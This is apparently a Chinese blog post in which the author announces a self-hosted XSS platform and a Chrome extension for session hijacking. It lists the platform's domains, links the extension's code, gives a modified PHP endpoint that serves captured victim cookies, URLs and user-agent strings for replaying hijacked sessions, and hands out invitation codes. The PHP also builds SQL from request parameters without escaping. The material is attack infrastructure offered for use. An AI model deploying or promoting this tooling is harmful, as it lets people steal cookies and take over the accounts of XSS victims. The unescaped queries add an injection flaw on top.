原先一直用xss.hk结果不知怎么被关的,正好手上有代码于是自己搭了一个,网上的类似的xss平台大多一样,原先的xss的chrome插件,不适合 "manifest_version": 2, 
而且很多其他的xss平台直接把代码拿过来,chrome插件的里面的许多代码内容跟xss.me这个与域名绑定的,而且有些加密cookie里面有浏览器的ua信息绑定,所以只用插件替换cookie有时候无法达到效果,否则得借助第三方修改header的插件,我们希望的是完全模拟劫持到的浏览器会话。 
于是有了这一次的修改,php那把在/do/auth的那个接口返回增加了劫持ua的信息,点击口修改当前浏览器cookie跟ua来劫持会话。 
数据放在别人那总归不放心,当然你也可以只用插件,填你自己的接口的信息,你只用插件来劫持会话,我也不会知道你的数据,不过你得稍微修改下php后台的的接口。

平台地址:

x.liet.me

因被公司和谐,域名转到原先的账号依然存在 code4liet.duapp.com

chrome xss mitm attack插件代码地址

https://github.com/lietdai/xss-mitm-attack

修改后的do.php

<?php

/**

 * api.php 接口

 * ----------------------------------------------------------------

 * OldCMS,site:http://www.oldcms.com

 */

if(!defined('IN_OLDCMS')) die('Access Denied');

$auth=Val('auth','GET');

$db=DBConnect();

$project=$db->FirstRow("SELECT * FROM ".Tb('project')." WHERE authCode='{$auth}'");

if(empty($project)) exit('Auth Err.');

switch($act){

    case 'content':

    default:

        $domain=Val('domain','GET');

        $where='';

        if(!empty($domain)) $where.=" AND domain='{$domain}'";

        $res=$db->Dataset("SELECT content,serverContent FROM ".Tb('project_content')." WHERE projectId='{$project[id]}' {$where} ORDER BY id DESC");

        $data=array();

        foreach($res as $k=>$v){

            $row=array();

            $content=json_decode($v['content'],true);

            $serverContent = json_decode($v['serverContent'],true);

            $row['url']=$content['opener']?$content['opener']: $content['toplocation'];

            $row['cookie']=$content['cookie'];

            $serverContent = json_decode($v['serverContent'],true);

            $row['ua'] = $serverContent['HTTP_USER_AGENT']?:"";

            $data[]=$row;

        }

        echo JsonEncode($data);

        break;

}

?>

发几个邀请码

71ac500c5a331cb7b2806a8e817f1672

34f3f778fa77c0f7fe8efb162ae70db0

df8825cf489fbca96a4663262afd02e1

65d17af1988fdde9f81696105c0ce3eb

4bdf5873cc19e995a925cbf203fdeeba

a66411d043503ea0bfe106a98a093c59

0695d3e66ab68d2b6d88949cbaf575c3

fb92a90b9a8264862699ed04a7d432a4

d358e24bc7ce3e81c73d54dbbb8b1195

禁止x政教=。=

最新文章

  1. nodejs核心模块之http
  2. 《Linux内核设计与实现》读书笔记 第一、二章
  3. 将自己写的库上传到cocoapods(2015)
  4. c++实现矩阵类矩阵行列式,伴随矩阵,逆矩阵
  5. Linux进程通信 之 信号灯(semphore)(System V &amp;&amp; POSIX)
  6. Codeforces Round #195 A B C 三题合集 (Div. 2)
  7. Git.Framework 框架随手记--准备工作
  8. Delphi中TStringList类常用属性方法详解
  9. 动态规划(状态压缩):BZOJ 2621 [Usaco2012 Mar]Cows in a Skyscraper
  10. canvas阴影
  11. Linux for周期运行命令注意事项
  12. [LeetCode] Set Mismatch 设置不匹配
  13. 上传文件服务与web服务分离
  14. Keepalived详解(五):Keepalived集群中MASTER和BACKUP角色选举策略【转】
  15. spfa算法----最短路
  16. English Voice of &lt;&lt;See You Again &gt;&gt;
  17. SpringMVC学习四(@ModelMap @RequestBody等等的说明)
  18. OD之绕过序列号验证(二)
  19. 【Dynamic Programming】DP算法
  20. ats编译中增加透明度 选项

热门文章

  1. 基础连接已经关闭: 未能为SSL/TLS 安全通道建立信任关系
  2. Android下拉刷新-SwipeRefreshLayout,RecyclerView完全解析之下拉刷新与上拉加载SwipeRefreshLayout)
  3. 用Chrome浏览器模拟手机,android,iphone,ipad访问网站
  4. LearnMVC5-AddController
  5. uboot在s3c2440上的移植(1)
  6. 第四节 数据格式化和ModelAttribute注解的介绍
  7. poj 2029 二维树状数组
  8. Linux 驱动分类 与访问技术
  9. bootstrap daterangepicker 添加阴历及节假日
  10. Android OpenGL ES(三)----编程框架